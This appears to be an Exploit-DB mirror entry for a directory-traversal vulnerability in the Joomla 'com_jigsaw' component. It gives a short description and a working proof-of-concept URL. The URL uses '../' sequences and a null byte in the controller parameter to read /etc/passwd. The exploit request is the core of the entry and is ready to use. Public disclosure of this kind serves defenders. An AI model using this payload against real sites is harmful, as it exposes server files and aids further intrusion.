exploit-db-mirror/platforms/php/webapps/34393.txt
Offensive Security 414aad7eb0 Updated 08_23_2014
2014-08-23 04:40:24 +00:00

7 lines
No EOL
419 B
Text
Executable file

source: http://www.securityfocus.com/bid/42144/info
The 'com_jigsaw' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00